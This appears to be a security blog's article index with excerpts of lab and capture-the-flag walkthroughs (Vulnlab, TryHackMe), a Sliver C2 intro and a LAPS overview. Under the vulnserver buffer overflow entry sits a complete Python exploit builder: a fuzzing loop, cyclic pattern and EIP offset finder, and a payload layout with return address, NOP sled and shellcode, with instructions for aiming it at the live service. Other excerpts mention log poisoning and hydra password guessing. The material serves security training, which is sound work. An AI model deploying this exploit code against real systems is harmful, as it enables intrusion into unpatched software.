SLIVER C2
Introducing SLIVER C2. Sliver is an open-source command and control (C2) framework developed by Bishop Fox that lets red teams simulate realistic attacks. It combines modularity, security and flexibility for modern penetration testing. What is a C2 framework? A C2 framework lets an operator remotely control compromised machines through implants (or agents). These implants receive instructions from the C2 server, such as executing commands, transferring files or gathering information. The...
LAPS
In most Active Directory infrastructures, each workstation has a local administrator account. This account is often poorly managed, and in some cases its password is identical on every machine. As a result, an attacker who compromises one machine can easily pivot across the network. To solve this problem, Microsoft introduced LAPS v1 (Local Administrator Password Solution) in 2015, then released a more comprehensive version in 2023. This article looks at how the two versions work, and the ...
Vulnlab - Lustrous
User enumeration: We start by running an nmap scan: ...
Vulnlab - Hybrid
Hybrid is an Active Directory chain containing a Windows machine and a Linux machine. Initial access is gained by compromising the Linux machine, then the domain can be compromised using an ADCS attack. Enumeration: We start by running an nmap scan on the IPs provided. ┌──(kali㉿kali)-[~/ctf/vulnlab/hybrid] └─$ nmap -A -iL ips Starting Nmap 7.94SVN ( https://nm...
Vulnlab - Heron
Heron is a medium-difficulty lab. The scenario assumes an initial compromise of a Linux machine joined to a domain, from which we need to pivot to a domain controller and try to compromise it. Enumeration: Let's start with the usual Nmap scan. The scan shows that 10.10.168.69 has no accessible ports, probably due to a firewall. On the other hand, 10.10.168.70 has port 22 open, which suggests we should start by connecting to the Linux machine via SSH. The Wiki page tells us that this is a suppos...
Vulnlab - Tea
Synthesis: Tea is an Active Directory chain with two machines to compromise. Initial access is gained by exploiting a CI/CD runner on a Gitea instance, and full domain compromise is possible through the domain controller's WSUS connection. Initial enumeration: Let's start with an nmap scan of both machines. It looks like we have a domain controller that isn't behind a firewall and a machine hosting web services. We can retrieve the names of both machines using NetExec: We add t...
Vulnlab - Trusted
Initial access: Thanks to the nmap scan, we quickly discover that one of the servers hosts an XAMPP server. By listing its directories, we discover a website: After browsing the site, we notice that it is potentially vulnerable to a BIA: This is confirmed by accessing the server log at the following link: http://10.10.162.134/dev/index.html?view=C:/xampp/apache/logs/access.log In this way, we can gain access to the machine by log poisoning. To do this, we send a request with PHP code in the user...
THM - Skynet
Enumeration: Enumeration of open ports using nmap: Looking at the SMB share, we see that it is possible to connect using the guest account: A log1.txt file is then retrieved from the anonymous share, which appears to contain passwords: Listing the web server folders with dirb, we come across a mail server login page: Mail server access: Using hydra and the log1.txt file, we find the password for the milesdyson account (a name found when enumerating the SMB shares). This gives us acc...
BufferOverFlow avec SPIKE
Objective: Exploit a buffer overflow vulnerability in an application by taking control of the EIP register and executing shellcode. 1. Connect to the target and launch vulnserver. RDP connection to the target: rdesktop -u IEUser -p 'Passw0rd!' 172.16.5.120 Launch vulnserver with: vulnserver.exe 9999 Interacting with the server from our machine, we notice that depending on how we type the command and what we send, we get different responses. 2. Fuzzing with SPIKE: Create a trun.spk sc...
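The steps above (fuzz the TRUN command until the service dies, then find where in the buffer EIP gets overwritten, then place a return address and shellcode there) are the standard EIP-overwrite workflow. The following Python is an added example, not code from the original article: it reproduces the crash-length search a SPIKE script performs, generates a Metasploit-style cyclic pattern, resolves the EIP value reported by the debugger to a byte offset, and lays out the final buffer. It assumes an x86 target (32-bit little-endian EIP) and the usual vulnserver command prefix `TRUN /.:/`; the target stand-in used when run directly, and the return address and shellcode passed to `build_exploit_buffer`, are constructed placeholders, not values found on this page.

```python
import itertools
import string
import struct

# Added example for the vulnserver TRUN overflow procedure (not the article's own code).
# Assumptions: x86 target (EIP, little-endian), command prefix b"TRUN /.:/", and the
# return address / shellcode passed in by the caller are placeholders to be replaced
# with what the debugger work actually yields.

PATTERN_MAX = 26 * 26 * 10 * 3  # 20280 bytes before the Aa0..Zz9 cycle would repeat


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 3-byte window is unique inside
    the first 20280 bytes, so the 4 bytes that land in EIP pinpoint the offset."""
    if not 0 <= length <= PATTERN_MAX:
        raise ValueError("length must be between 0 and 20280")
    triplets = (u + l + d
                for u in string.ascii_uppercase
                for l in string.ascii_lowercase
                for d in string.digits)
    text = "".join(itertools.islice(triplets, length // 3 + 1))
    return text[:length].encode()


def pattern_offset(eip_value: int, length: int = PATTERN_MAX) -> int:
    """Byte offset within the pattern at which the 4 bytes now in EIP start.
    eip_value is the register as the debugger prints it (e.g. 0x396F4338).
    Returns -1 when the value is not part of the pattern, i.e. EIP was not
    overwritten by our data."""
    needle = struct.pack("<I", eip_value)  # x86 stores the dword little-endian
    return cyclic_pattern(length).find(needle)


def fuzz_lengths(send_and_check, start: int = 100, step: int = 100, limit: int = 5000) -> int:
    """What a SPIKE script does for TRUN: send growing strings until the service
    stops answering. send_and_check(payload) returns True while the target still
    responds; the first length for which it returns False is the crash length.
    Returns -1 if no crash is observed before `limit`."""
    for size in range(start, limit + 1, step):
        if not send_and_check(b"TRUN /.:/" + b"A" * size):
            return size
    return -1


def build_exploit_buffer(offset: int, ret_addr: int, shellcode: bytes,
                         prefix: bytes = b"TRUN /.:/", nop_sled: int = 16) -> bytes:
    """Final payload layout: filler up to EIP, the return address (e.g. a JMP ESP
    gadget, packed little-endian), a NOP sled, then the shellcode."""
    return (prefix + b"A" * offset + struct.pack("<I", ret_addr)
            + b"\x90" * nop_sled + shellcode)


if __name__ == "__main__":
    # Constructed stand-in for the vulnerable service: it "crashes" once the TRUN
    # argument exceeds 2000 bytes. Against the real target this would be a TCP
    # send/recv to port 9999 instead.
    def fake_target(payload: bytes) -> bool:
        return len(payload) - len(b"TRUN /.:/") <= 2000

    crash_len = fuzz_lengths(fake_target)
    pattern = cyclic_pattern(crash_len + 400)
    # Pretend the debugger reported EIP = the dword found at offset 2003 of the pattern
    eip = struct.unpack("<I", pattern[2003:2007])[0]
    print("crash at", crash_len, "bytes; EIP offset", pattern_offset(eip))
    # 0x11223344 is a placeholder, not a real JMP ESP address
    print(build_exploit_buffer(pattern_offset(eip), 0x11223344, b"\xcc")[:16])
```

Against the live target, `send_and_check` wraps a `socket` connect/send/recv to port 9999 and treats a reset or timeout as "no answer"; the rest of the workflow is unchanged, and the only values you must still obtain from the debugger are the EIP dword after the pattern crash and a usable JMP ESP address.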
THM - Relevant
We start with an nmap scan. We can see that the open ports correspond to those of a Windows machine, which is confirmed by visiting the website on port 80. We start by trying to enumerate SMB shares with the guest account: Note that we have read and write rights on a share. Using impacket-smbclient, we discover a password.txt file containing base64: Decoding it with CyberChef, we obtain Bob's and Bill's credentials: After trying to use these accounts to access other parts of the serve...